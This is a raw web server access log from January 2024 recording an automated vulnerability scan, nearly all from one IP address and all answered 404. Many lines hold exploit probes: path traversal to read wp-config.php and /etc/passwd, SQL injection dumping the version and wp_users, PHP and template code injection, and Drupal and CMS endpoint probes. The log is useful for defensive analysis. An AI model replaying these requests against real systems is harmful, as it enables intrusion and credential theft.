137.220.197.141 - - [21/Jan/2024:08:53:42 +0100] "POST /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:53:52 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:53:54 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:53:59 +0100] "POST /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:54:03 +0100] "POST /ws_utc/resources/setting/options HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:54:05 +0100] "POST /ws_utc/resources/setting/keystore HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:54:37 +0100] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:54:49 +0100] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:55:02 +0100] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:55:43 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:55:45 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 404 952
96.127.160.234 - - [21/Jan/2024:08:56:04 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:56:35 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:56:37 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:58:44 +0100] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:08:59:44 +0100] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:00:10 +0100] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:04:14 +0100] "GET /tag_test_action.php?url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:04:47 +0100] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:05:38 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:05:40 +0100] "GET /tag_test_action.php?url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:05:40 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:05:47 +0100] "POST /webtools/control/xmlrpc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:05:51 +0100] "GET /tag_test_action.php?url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:06:04 +0100] "GET /tag_test_action.php?url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:07:09 +0100] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:07:20 +0100] "POST /webtools/control/xmlrpc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:07:24 +0100] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:07:32 +0100] "POST /webtools/control/xmlrpc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:07:44 +0100] "POST /webtools/control/xmlrpc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:09:05 +0100] "GET /tag_test_action.php?url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:09:55 +0100] "GET /tag_test_action.php?url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:10:19 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:10:19 +0100] "GET /tag_test_action.php?url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:10:21 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:10:27 +0100] "GET / HTTP/1.1" 404 952
146.19.24.23 - - [21/Jan/2024:09:10:48 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:10:49 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:10:51 +0100] "GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:11:01 +0100] "POST /webtools/control/xmlrpc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:11:54 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:11:54 +0100] "POST /webtools/control/xmlrpc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:12:05 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:12:17 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:12:18 +0100] "POST /webtools/control/xmlrpc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:14:08 +0100] "GET /tag_test_action.php?url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:15:20 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:16:10 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:16:11 +0100] "GET /tag_test_action.php?url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:16:24 +0100] "POST /webtools/control/xmlrpc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:16:24 +0100] "GET /tag_test_action.php?url=a&token&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:16:34 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:17:56 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:18:33 +0100] "POST /webtools/control/xmlrpc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:18:47 +0100] "POST /webtools/control/xmlrpc HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:19:30 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:19:42 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:19:55 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:20:27 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:22:31 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:22:44 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:23:17 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:24:10 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:24:34 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:28:48 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:29:38 +0100] "GET /modules/bamegamenu/ajax_phpcode.php?code=print(md5(999999999)) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:30:42 +0100] "GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:30:56 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:31:07 +0100] "GET /user/scripts/login_par.js HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:31:08 +0100] "GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:31:12 +0100] "GET /modules/bamegamenu/ajax_phpcode.php?code=print(md5(999999999)) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:31:23 +0100] "GET /modules/bamegamenu/ajax_phpcode.php?code=print(md5(999999999)) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:31:36 +0100] "GET /modules/bamegamenu/ajax_phpcode.php?code=print(md5(999999999)) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:31:57 +0100] "GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:32:19 +0100] "GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:32:28 +0100] "GET /user/scripts/login_par.js HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:32:31 +0100] "GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:32:38 +0100] "GET /user/scripts/login_par.js HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:32:44 +0100] "GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:32:50 +0100] "GET /user/scripts/login_par.js HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:33:36 +0100] "GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:33:47 +0100] "GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:34:00 +0100] "GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:35:01 +0100] "GET /modules/bamegamenu/ajax_phpcode.php?code=print(md5(999999999)) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:35:38 +0100] "GET /user/scripts/login_par.js HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:35:42 +0100] "GET /Admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:35:52 +0100] "GET /modules/bamegamenu/ajax_phpcode.php?code=print(md5(999999999)) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:36:16 +0100] "GET /modules/bamegamenu/ajax_phpcode.php?code=print(md5(999999999)) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:36:16 +0100] "GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:36:22 +0100] "GET /user/scripts/login_par.js HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:36:45 +0100] "GET /user/scripts/login_par.js HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:36:58 +0100] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:37:03 +0100] "GET /Admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:37:11 +0100] "GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:37:14 +0100] "GET /Admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:37:26 +0100] "GET /Admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:37:35 +0100] "GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:37:35 +0100] "GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:37:40 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:38:22 +0100] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:38:31 +0100] "GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:38:33 +0100] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:38:35 +0100] "GET /?id=vxJQbQ%25{128*128} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:38:45 +0100] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:38:58 +0100] "GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:39:21 +0100] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:39:44 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:39:59 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:40:02 +0100] "GET /?id=vxJQbQ%25{128*128} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:40:14 +0100] "GET /?id=vxJQbQ%25{128*128} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:40:17 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:40:26 +0100] "GET /Admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:40:26 +0100] "GET /?id=vxJQbQ%25{128*128} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:40:29 +0100] "GET /user/scripts/login_par.js HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:40:36 +0100] "GET /modules/bamegamenu/ajax_phpcode.php?code=print(md5(999999999)) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:41:02 +0100] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:41:14 +0100] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:41:14 +0100] "GET /Admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:41:27 +0100] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:41:38 +0100] "GET /Admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:41:44 +0100] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:42:02 +0100] "GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:42:29 +0100] "GET /user/scripts/login_par.js HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:42:33 +0100] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:42:42 +0100] "GET /user/scripts/login_par.js HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:42:50 +0100] "GET /modules/bamegamenu/ajax_phpcode.php?code=print(md5(999999999)) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:42:55 +0100] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:43:04 +0100] "GET /modules/bamegamenu/ajax_phpcode.php?code=print(md5(999999999)) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:43:28 +0100] "GET /?id=vxJQbQ%25{128*128} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:43:28 +0100] "GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:44:19 +0100] "GET /?id=vxJQbQ%25{128*128} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:44:19 +0100] "GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:44:34 +0100] "GET /wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:44:34 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:44:42 +0100] "GET /?id=vxJQbQ%25{128*128} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:45:06 +0100] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:45:26 +0100] "GET /Admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:45:47 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:45:47 +0100] "GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:46:02 +0100] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:46:04 +0100] "GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:46:20 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:46:27 +0100] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:46:42 +0100] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:47:26 +0100] "GET /Admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:47:40 +0100] "GET /Admin HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:48:34 +0100] "GET /?id=vxJQbQ%25{128*128} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:48:44 +0100] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:48:56 +0100] "GET /device.rsp?opt=user&cmd=list HTTP/1.1" 404 952
144.131.40.30 - - [21/Jan/2024:09:50:17 +0100] "POST /cgi-bin/ViewLog.asp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:50:36 +0100] "GET /?id=vxJQbQ%25{128*128} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:50:50 +0100] "GET /?id=vxJQbQ%25{128*128} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:50:51 +0100] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:51:37 +0100] "GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:51:39 +0100] "GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:51:44 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:51:44 +0100] "GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:53:06 +0100] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:53:20 +0100] "POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:53:23 +0100] "GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:53:34 +0100] "GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:53:48 +0100] "GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:54:35 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:54:53 +0100] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:55:00 +0100] "GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:55:02 +0100] "GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:55:24 +0100] "GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:55:26 +0100] "GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:55:50 +0100] "GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:55:52 +0100] "GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:56:09 +0100] "GET /api/filemanager?path=%2F..%2f..%2fContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:57:18 +0100] "GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:57:34 +0100] "GET /api/filemanager?path=%2F..%2f..%2fContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:57:44 +0100] "GET /api/filemanager?path=%2F..%2f..%2fContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:57:46 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:57:56 +0100] "GET /api/filemanager?path=%2F..%2f..%2fContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:58:12 +0100] "GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:58:36 +0100] "GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:59:22 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:59:34 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:09:59:47 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:00:50 +0100] "GET /api/filemanager?path=%2F..%2f..%2fContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:01:29 +0100] "GET /debug/pprof/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:01:31 +0100] "GET /debug/pprof/goroutine?debug=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:01:37 +0100] "GET /api/filemanager?path=%2F..%2f..%2fContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:02:00 +0100] "GET /api/filemanager?path=%2F..%2f..%2fContent HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:02:52 +0100] "GET /?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20- HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:03:09 +0100] "GET /glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:03:11 +0100] "GET /scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:03:21 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:04:17 +0100] "POST /checkValid HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:04:17 +0100] "GET /debug/pprof/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:04:20 +0100] "GET /debug/pprof/goroutine?debug=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:10:04:39 +0100] "GET /debug/pprof/ HTTP/1.1" 404 952
